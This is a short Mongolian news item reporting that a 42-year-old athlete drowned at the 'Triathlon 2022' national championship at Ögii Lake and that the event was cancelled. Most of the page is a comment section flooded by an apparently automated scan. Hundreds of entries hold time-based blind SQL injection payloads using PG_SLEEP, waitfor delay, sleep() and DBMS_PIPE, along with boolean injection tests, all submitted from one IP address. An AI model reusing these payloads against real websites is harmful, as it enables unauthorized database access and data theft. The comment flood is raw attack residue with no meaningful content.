Өгий нууранд “Триатлон 2022“ тэмцээнд оролцож байсан тамирчин нас барж, тэмцээн цуцлагдлаа

Aдмин / Орон нутаг

Архангай аймгийн Өгий нуурт өчигдөр буюу 07 дугаар сарын 07-ны өдөр "Триатло - 2022" улсын аварга шалгаруулах тэмцээн эхэлсэн билээ. Гэвч тус тэмцээнд оролцож байсан 42 настай тамирчин усанд осолдож амь насаа алдсан харамсалтай хэрэг гарчээ.

Улмаар уг тэмцээн цаашид үргэлжлэх боломжгүй болж цуцлагдсан байна. Дээрх тамирчны нас барсан хэргийг цагдаагийн байгууллагаас шалгаж байгаа аж.


Сэтгэгдэл

Зочин [@@bYJmN] 2022-07-10 23:07:07

Зочин [1] 2022-07-10 23:07:07

Зочин [1'"] 2022-07-10 23:07:06

Зочин [196.196.203.214'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'] 2022-07-10 23:07:06

Зочин [LSwKUttc')) OR 710=(SELECT 710 FROM PG_SLEEP(15))--] 2022-07-10 23:06:54

Зочин [FWKD0Bqx') OR 250=(SELECT 250 FROM PG_SLEEP(15))--] 2022-07-10 23:06:42

Зочин [kFUPGPOl' OR 465=(SELECT 465 FROM PG_SLEEP(15))--] 2022-07-10 23:06:29

Зочин [lRHjDqtT'; waitfor delay '0:0:15' -- ] 2022-07-10 23:06:17

Зочин [1 waitfor delay '0:0:15' -- ] 2022-07-10 23:06:04

Зочин [(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/] 2022-07-10 23:05:53

Зочин [0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z] 2022-07-10 23:05:40

Зочин [0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z] 2022-07-10 23:05:28

Зочин [if(now()=sysdate(),sleep(15),0)] 2022-07-10 23:05:16

Зочин [-1" OR 2+306-306-1=0+0+0+1 -- ] 2022-07-10 23:05:04

Зочин [-1' OR 2+223-223-1=0+0+0+1 or 'MHytnDMK'='] 2022-07-10 23:05:04

Зочин [-1' OR 2+390-390-1=0+0+0+1 -- ] 2022-07-10 23:05:04

Зочин [-1 OR 2+292-292-1=0+0+0+1] 2022-07-10 23:05:03

Зочин [-1 OR 2+993-993-1=0+0+0+1 -- ] 2022-07-10 23:05:03

Зочин [AI2eM3Jq] 2022-07-10 23:05:02

Зочин [196.196.203.214] 2022-07-10 23:04:50

Зочин [196.196.203.214] 2022-07-10 23:04:37

Зочин [196.196.203.214] 2022-07-10 23:04:21

Зочин [196.196.203.214] 2022-07-10 23:04:20

Зочин [196.196.203.214] 2022-07-10 23:04:06

Зочин [196.196.203.214] 2022-07-10 23:03:54

Зочин [196.196.203.214] 2022-07-10 23:03:41

Зочин [196.196.203.214] 2022-07-10 23:03:18

Зочин [196.196.203.214] 2022-07-10 23:03:07

Зочин [196.196.203.214] 2022-07-10 23:02:55

Зочин [196.196.203.214] 2022-07-10 23:02:43

Зочин [196.196.203.214] 2022-07-10 23:02:19

Зочин [196.196.203.214] 2022-07-10 23:02:07

Зочин [@@oKA9l] 2022-07-10 23:02:06

Зочин [1] 2022-07-10 23:02:06

Зочин [1'"] 2022-07-10 23:02:06

Зочин [196.196.203.214'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'] 2022-07-10 23:02:05

Зочин [196.196.203.214] 2022-07-10 23:01:55

Зочин [E2mD8z9A')) OR 494=(SELECT 494 FROM PG_SLEEP(15))--] 2022-07-10 23:01:53

Зочин [196.196.203.214] 2022-07-10 23:01:43

Зочин [gyQsDjtN') OR 619=(SELECT 619 FROM PG_SLEEP(15))--] 2022-07-10 23:01:41

Зочин [196.196.203.214] 2022-07-10 23:01:31

Зочин [SCza5OVf' OR 755=(SELECT 755 FROM PG_SLEEP(15))--] 2022-07-10 23:01:29

Зочин [196.196.203.214] 2022-07-10 23:01:19

Зочин [Du1TkPAW'; waitfor delay '0:0:15' -- ] 2022-07-10 23:01:17

Зочин [196.196.203.214] 2022-07-10 23:01:07

Зочин [196.196.203.214] 2022-07-10 23:01:07

Зочин [196.196.203.214] 2022-07-10 23:01:06

Зочин [196.196.203.214] 2022-07-10 23:01:06

Зочин [196.196.203.214] 2022-07-10 23:01:06

Зочин [196.196.203.214] 2022-07-10 23:01:05

Зочин [1 waitfor delay '0:0:15' -- ] 2022-07-10 23:01:05

Зочин [196.196.203.214] 2022-07-10 23:00:52

Зочин [(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/] 2022-07-10 23:00:51

Зочин [196.196.203.214] 2022-07-10 23:00:40

Зочин [0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z] 2022-07-10 23:00:39

Зочин [0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z] 2022-07-10 23:00:25

Зочин [196.196.203.214] 2022-07-10 23:00:25

aiPxvpay [196.196.203.214] 2022-07-10 23:00:18

1

Зочин [if(now()=sysdate(),sleep(15),0)] 2022-07-10 23:00:14

Зочин [196.196.203.214] 2022-07-10 23:00:13

Зочин [-1" OR 2+50-50-1=0+0+0+1 -- ] 2022-07-10 23:00:01

Зочин [-1' OR 2+924-924-1=0+0+0+1 or 'dBPw74Jn'='] 2022-07-10 23:00:01

Зочин [-1' OR 2+70-70-1=0+0+0+1 -- ] 2022-07-10 23:00:00

Зочин [-1 OR 2+39-39-1=0+0+0+1] 2022-07-10 23:00:00

Зочин [-1 OR 2+204-204-1=0+0+0+1 -- ] 2022-07-10 22:59:59

Зочин [ir1NRNXV] 2022-07-10 22:59:59

aiPxvpay [196.196.203.214] 2022-07-10 22:59:53

1

Зочин [196.196.203.214] 2022-07-10 22:59:46

aiPxvpay [196.196.203.214] 2022-07-10 22:59:39

1

Зочин [196.196.203.214] 2022-07-10 22:59:34

aiPxvpay [196.196.203.214] 2022-07-10 22:59:28

1

Зочин [196.196.203.214] 2022-07-10 22:59:21

aiPxvpay [196.196.203.214] 2022-07-10 22:59:17

1

Зочин [196.196.203.214] 2022-07-10 22:59:09

aiPxvpay [196.196.203.214] 2022-07-10 22:59:04

1

aiPxvpay [196.196.203.214] 2022-07-10 22:58:52

1

aiPxvpay [196.196.203.214] 2022-07-10 22:58:39

1

aiPxvpay [196.196.203.214] 2022-07-10 22:58:15

1

aiPxvpay [196.196.203.214] 2022-07-10 22:58:02

1

aiPxvpay [196.196.203.214] 2022-07-10 22:57:50

1

aiPxvpay [196.196.203.214] 2022-07-10 22:57:38

1

aiPxvpay [196.196.203.214] 2022-07-10 22:57:26

1

aiPxvpay [196.196.203.214] 2022-07-10 22:57:14

1

aiPxvpay [196.196.203.214] 2022-07-10 22:57:02

1

aiPxvpay [196.196.203.214] 2022-07-10 22:57:02

1

aiPxvpay [196.196.203.214] 2022-07-10 22:57:01

1

aiPxvpay [196.196.203.214] 2022-07-10 22:57:01

1

aiPxvpay [196.196.203.214] 2022-07-10 22:57:00

1

aiPxvpay [196.196.203.214] 2022-07-10 22:57:00

1

Зочин [196.196.203.214] 2022-07-10 22:56:53

Зочин [196.196.203.214] 2022-07-10 22:56:41

Зочин [196.196.203.214] 2022-07-10 22:56:28

@@VB2pE

Зочин [196.196.203.214] 2022-07-10 22:56:28

1

Зочин [196.196.203.214] 2022-07-10 22:56:27

1'"

Зочин [196.196.203.214] 2022-07-10 22:56:27

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Зочин [196.196.203.214] 2022-07-10 22:56:13

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Зочин [196.196.203.214] 2022-07-10 22:56:00

6JMTVUM1')) OR 186=(SELECT 186 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:55:48

aG1k31dd') OR 671=(SELECT 671 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:55:38

Зочин [196.196.203.214] 2022-07-10 22:55:36

zQhNBQC2' OR 774=(SELECT 774 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:55:25

Зочин [196.196.203.214] 2022-07-10 22:55:23

-1)) OR 907=(SELECT 907 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:55:11

@@jcYhQ

Зочин [196.196.203.214] 2022-07-10 22:55:11

1

Зочин [196.196.203.214] 2022-07-10 22:55:10

1'"

Зочин [196.196.203.214] 2022-07-10 22:55:10

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Зочин [196.196.203.214] 2022-07-10 22:55:08

-5) OR 285=(SELECT 285 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:54:57

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Зочин [196.196.203.214] 2022-07-10 22:54:56

-5 OR 292=(SELECT 292 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:54:45

o0tW75fn')) OR 693=(SELECT 693 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:54:44

wkd13ehv'; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 22:54:33

oBUAnc7p') OR 184=(SELECT 184 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:54:31

1 waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 22:54:19

mA8QQ1YX' OR 677=(SELECT 677 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:54:18

-1); waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 22:54:07

-1)) OR 262=(SELECT 262 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:54:05

-1; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 22:53:52

-5) OR 801=(SELECT 801 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:53:52

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Зочин [196.196.203.214] 2022-07-10 22:53:39

-5 OR 207=(SELECT 207 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:53:38

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Зочин [196.196.203.214] 2022-07-10 22:53:26

jRVL5zv3'; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 22:53:25

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Зочин [196.196.203.214] 2022-07-10 22:53:13

1 waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 22:53:13

if(now()=sysdate(),sleep(15),0)

Зочин [196.196.203.214] 2022-07-10 22:53:01

-1); waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 22:53:00

-1" OR 2+21-21-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 22:53:00

-1' OR 2+232-232-1=0+0+0+1 or 'wlR2boGp'='

Зочин [196.196.203.214] 2022-07-10 22:53:00

-1' OR 2+46-46-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 22:52:59

-1 OR 2+861-861-1=0+0+0+1

Зочин [196.196.203.214] 2022-07-10 22:52:59

-1 OR 2+573-573-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 22:52:58

I7rRUgqw

Зочин [196.196.203.214] 2022-07-10 22:52:48

-1; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 22:52:45

1

Зочин [196.196.203.214] 2022-07-10 22:52:36

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Зочин [196.196.203.214] 2022-07-10 22:52:32

1

Зочин [196.196.203.214] 2022-07-10 22:52:22

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

@@dOjlB [196.196.203.214] 2022-07-10 22:52:18

1 [196.196.203.214] 2022-07-10 22:52:18

1'" [196.196.203.214] 2022-07-10 22:52:17

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' [196.196.203.214] 2022-07-10 22:52:16

Зочин [196.196.203.214] 2022-07-10 22:52:08

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) [196.196.203.214] 2022-07-10 22:52:01

Зочин [196.196.203.214] 2022-07-10 22:51:54

if(now()=sysdate(),sleep(15),0)

xKEswpSY')) OR 685=(SELECT 685 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:51:46

Зочин [196.196.203.214] 2022-07-10 22:51:41

-1" OR 2+645-645-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 22:51:40

-1' OR 2+640-640-1=0+0+0+1 or 'ObA70eDW'='

Зочин [196.196.203.214] 2022-07-10 22:51:40

-1' OR 2+118-118-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 22:51:39

-1 OR 2+932-932-1=0+0+0+1

Зочин [196.196.203.214] 2022-07-10 22:51:39

-1 OR 2+583-583-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 22:51:38

fZwesRvX

RUL4h4UQ') OR 156=(SELECT 156 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:51:34

Зочин [196.196.203.214] 2022-07-10 22:51:26

1

4pl5OhPz' OR 125=(SELECT 125 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:51:20

Зочин [196.196.203.214] 2022-07-10 22:51:11

1

-1)) OR 271=(SELECT 271 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:51:07

@@uNfWH [196.196.203.214] 2022-07-10 22:51:00

1 [196.196.203.214] 2022-07-10 22:50:59

1'" [196.196.203.214] 2022-07-10 22:50:59

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' [196.196.203.214] 2022-07-10 22:50:59

-5) OR 502=(SELECT 502 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:50:54

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) [196.196.203.214] 2022-07-10 22:50:46

-5 OR 842=(SELECT 842 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:50:42

FgbcKPNa')) OR 370=(SELECT 370 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:50:32

uVtzQ1pk'; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:50:27

fnXS23eS') OR 37=(SELECT 37 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:50:18

1 waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:50:14

l9QHfL7Y' OR 369=(SELECT 369 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:50:05

-1); waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:50:01

-1)) OR 797=(SELECT 797 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:49:51

-1; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:49:48

-5) OR 213=(SELECT 213 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:49:36

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ [196.196.203.214] 2022-07-10 22:49:33

-5 OR 788=(SELECT 788 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:49:22

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z [196.196.203.214] 2022-07-10 22:49:19

zVcfIkUH'; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:49:08

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z [196.196.203.214] 2022-07-10 22:49:06

1 waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:48:55

if(now()=sysdate(),sleep(15),0) [196.196.203.214] 2022-07-10 22:48:53

-1); waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:48:41

-1" OR 2+801-801-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:48:39

-1' OR 2+749-749-1=0+0+0+1 or 'ZpalFvvz'=' [196.196.203.214] 2022-07-10 22:48:39

-1' OR 2+595-595-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:48:38

-1 OR 2+848-848-1=0+0+0+1 [196.196.203.214] 2022-07-10 22:48:38

-1 OR 2+846-846-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:48:38

a7y7mIjq [196.196.203.214] 2022-07-10 22:48:37

-1; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:48:28

1 [196.196.203.214] 2022-07-10 22:48:23

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ [196.196.203.214] 2022-07-10 22:48:14

1 [196.196.203.214] 2022-07-10 22:48:08

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z [196.196.203.214] 2022-07-10 22:47:58

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z [196.196.203.214] 2022-07-10 22:47:44

if(now()=sysdate(),sleep(15),0) [196.196.203.214] 2022-07-10 22:47:29

-1" OR 2+673-673-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:47:15

-1' OR 2+898-898-1=0+0+0+1 or 'EXBDHgn9'=' [196.196.203.214] 2022-07-10 22:47:15

-1' OR 2+491-491-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:47:14

-1 OR 2+800-800-1=0+0+0+1 [196.196.203.214] 2022-07-10 22:47:14

-1 OR 2+998-998-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:47:13

aboXzoV4 [196.196.203.214] 2022-07-10 22:47:13

1 [196.196.203.214] 2022-07-10 22:46:59

1 [196.196.203.214] 2022-07-10 22:46:42

aiPxvpay [196.196.203.214] 2022-07-10 22:45:23

1

Зочин [196.196.203.214] 2022-07-10 22:45:20

1

Зочин [196.196.203.214] 2022-07-10 22:45:09

aiPxvpay [196.196.203.214] 2022-07-10 22:45:08

1

Зочин [196.196.203.214] 2022-07-10 22:45:05

1

Зочин [196.196.203.214] 2022-07-10 22:44:56

Зочин [196.196.203.214] 2022-07-10 22:43:47

Зочин [196.196.203.214] 2022-07-10 22:43:32

Зочин [196.196.203.214] 2022-07-10 22:37:32

1

Зочин [196.196.203.214] 2022-07-10 22:37:32

1

Зочин [196.196.203.214] 2022-07-10 22:37:32

1

Зочин [196.196.203.214] 2022-07-10 22:37:32

1

Зочин [196.196.203.214] 2022-07-10 22:37:32

1

Зочин [196.196.203.214] 2022-07-10 22:37:32

1

Зочин [196.196.203.214] 2022-07-10 22:36:34

1

Зочин [196.196.203.214] 2022-07-10 22:36:34

1

Зочин [196.196.203.214] 2022-07-10 22:36:34

1

Зочин [196.196.203.214] 2022-07-10 22:36:34

1

Зочин [196.196.203.214] 2022-07-10 22:36:34

1

Зочин [196.196.203.214] 2022-07-10 22:36:34

1

Зочин [196.196.203.214] 2022-07-10 22:36:08

Зочин [196.196.203.214] 2022-07-10 22:36:08

Зочин [196.196.203.214] 2022-07-10 22:36:08

aiPxvpay [196.196.203.214] 2022-07-10 22:35:48

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:48

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:48

1

Зочин [196.196.203.214] 2022-07-10 22:35:44

Зочин [196.196.203.214] 2022-07-10 22:35:44

aiPxvpay [@@YFFbO] 2022-07-10 23:03:00

1

aiPxvpay [1] 2022-07-10 23:03:00

1

aiPxvpay [1'"] 2022-07-10 23:02:59

1

aiPxvpay [196.196.203.214'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'] 2022-07-10 23:02:59

1

aiPxvpay [HxIjgPbG')) OR 44=(SELECT 44 FROM PG_SLEEP(15))--] 2022-07-10 23:02:47

1

aiPxvpay [dPO1L32P') OR 242=(SELECT 242 FROM PG_SLEEP(15))--] 2022-07-10 23:02:35

1

aiPxvpay [qjR6gekJ' OR 77=(SELECT 77 FROM PG_SLEEP(15))--] 2022-07-10 23:02:24

1

aiPxvpay [rnBXcXQs'; waitfor delay '0:0:15' -- ] 2022-07-10 23:02:12

1

aiPxvpay [1 waitfor delay '0:0:15' -- ] 2022-07-10 23:02:00

1

aiPxvpay [(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/] 2022-07-10 23:01:48

1

aiPxvpay [0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z] 2022-07-10 23:01:36

1

aiPxvpay [0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z] 2022-07-10 23:01:23

1

aiPxvpay [if(now()=sysdate(),sleep(15),0)] 2022-07-10 23:01:12

1

aiPxvpay [-1" OR 2+325-325-1=0+0+0+1 -- ] 2022-07-10 23:00:58

1

aiPxvpay [-1' OR 2+981-981-1=0+0+0+1 or '2XlUBec6'='] 2022-07-10 23:00:58

1

aiPxvpay [-1' OR 2+934-934-1=0+0+0+1 -- ] 2022-07-10 23:00:58

1

aiPxvpay [-1 OR 2+604-604-1=0+0+0+1] 2022-07-10 23:00:57

1

aiPxvpay [-1 OR 2+381-381-1=0+0+0+1 -- ] 2022-07-10 23:00:57

1

aiPxvpay [LITzkcqu] 2022-07-10 23:00:56

1

aiPxvpay [196.196.203.214] 2022-07-10 23:00:44

1

aiPxvpay [196.196.203.214] 2022-07-10 23:00:32

1

aiPxvpay [196.196.203.214] 2022-07-10 23:00:17

1

aiPxvpay [196.196.203.214] 2022-07-10 23:00:05

1

aiPxvpay [196.196.203.214] 2022-07-10 22:56:48

1

aiPxvpay [196.196.203.214] 2022-07-10 22:56:34

1

aiPxvpay [196.196.203.214] 2022-07-10 22:56:20

1

aiPxvpay [196.196.203.214] 2022-07-10 22:56:08

1

aiPxvpay [196.196.203.214] 2022-07-10 22:52:24

1

aiPxvpay [196.196.203.214] 2022-07-10 22:52:12

1

aiPxvpay [196.196.203.214] 2022-07-10 22:51:56

@@PAhxt

aiPxvpay [196.196.203.214] 2022-07-10 22:51:56

1

aiPxvpay [196.196.203.214] 2022-07-10 22:51:55

1'"

aiPxvpay [196.196.203.214] 2022-07-10 22:51:55

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

aiPxvpay [196.196.203.214] 2022-07-10 22:51:41

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

aiPxvpay [196.196.203.214] 2022-07-10 22:51:28

yUm2bFJ7')) OR 909=(SELECT 909 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 22:51:14

SLvEm72R') OR 370=(SELECT 370 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 22:51:02

6VJ4GnB0' OR 620=(SELECT 620 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 22:50:49

-1)) OR 476=(SELECT 476 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 22:50:36

-5) OR 204=(SELECT 204 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 22:50:22

-5 OR 80=(SELECT 80 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 22:50:08

le4IeY2V'; waitfor delay '0:0:15' --

aiPxvpay [196.196.203.214] 2022-07-10 22:49:55

1 waitfor delay '0:0:15' --

aiPxvpay [196.196.203.214] 2022-07-10 22:49:39

-1); waitfor delay '0:0:15' --

aiPxvpay [196.196.203.214] 2022-07-10 22:49:26

-1; waitfor delay '0:0:15' --

aiPxvpay [196.196.203.214] 2022-07-10 22:49:12

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

aiPxvpay [196.196.203.214] 2022-07-10 22:48:59

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

aiPxvpay [196.196.203.214] 2022-07-10 22:48:45

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

aiPxvpay [196.196.203.214] 2022-07-10 22:48:32

if(now()=sysdate(),sleep(15),0)

aiPxvpay [196.196.203.214] 2022-07-10 22:48:18

-1" OR 2+537-537-1=0+0+0+1 --

aiPxvpay [196.196.203.214] 2022-07-10 22:48:18

-1' OR 2+891-891-1=0+0+0+1 or 'gwKCSWYE'='

aiPxvpay [196.196.203.214] 2022-07-10 22:48:18

-1' OR 2+74-74-1=0+0+0+1 --

aiPxvpay [196.196.203.214] 2022-07-10 22:48:17

-1 OR 2+997-997-1=0+0+0+1

aiPxvpay [196.196.203.214] 2022-07-10 22:48:17

-1 OR 2+897-897-1=0+0+0+1 --

aiPxvpay [196.196.203.214] 2022-07-10 22:48:16

yhOMB8Hv

aiPxvpay [196.196.203.214] 2022-07-10 22:48:01

1

aiPxvpay [196.196.203.214] 2022-07-10 22:47:47

1

@@bdKkT [196.196.203.214] 2022-07-10 22:47:32

1

1 [196.196.203.214] 2022-07-10 22:47:32

1

1'" [196.196.203.214] 2022-07-10 22:47:32

1

aiPxvpay'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' [196.196.203.214] 2022-07-10 22:47:31

1

vdFPmcEO')) OR 772=(SELECT 772 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:47:17

1

WxuykETQ') OR 724=(SELECT 724 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:47:03

1

ZfTpihyy' OR 522=(SELECT 522 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:46:48

1

KTUmnrAc'; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:46:33

1

1 waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:46:18

1

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ [196.196.203.214] 2022-07-10 22:46:04

1

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z [196.196.203.214] 2022-07-10 22:45:49

1

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z [196.196.203.214] 2022-07-10 22:45:35

1

if(now()=sysdate(),sleep(15),0) [196.196.203.214] 2022-07-10 22:45:20

1

-1" OR 2+571-571-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:45:05

1

-1' OR 2+617-617-1=0+0+0+1 or 'AAwYxigD'=' [196.196.203.214] 2022-07-10 22:45:04

1

-1' OR 2+894-894-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:45:04

1

-1 OR 2+595-595-1=0+0+0+1 [196.196.203.214] 2022-07-10 22:45:04

1

-1 OR 2+558-558-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:45:03

1

pBY506Bo [196.196.203.214] 2022-07-10 22:45:03

1

aiPxvpay [196.196.203.214] 2022-07-10 22:44:50

1

aiPxvpay [196.196.203.214] 2022-07-10 22:44:36

1

aiPxvpay [196.196.203.214] 2022-07-10 22:43:36

1

aiPxvpay [196.196.203.214] 2022-07-10 22:43:21

1

aiPxvpay [196.196.203.214] 2022-07-10 22:41:38

1

aiPxvpay [196.196.203.214] 2022-07-10 22:41:23

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:57

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:57

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:57

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:57

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:56

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:56

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:56

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:56

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:56

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:56

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:56

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:56

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:56

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:56

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:56

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:56

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:56

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:55

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:55

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:55

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:55

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:55

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:55

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:55

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:55

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:55

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:55

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:55

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:55

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:55

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:54

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:54

1

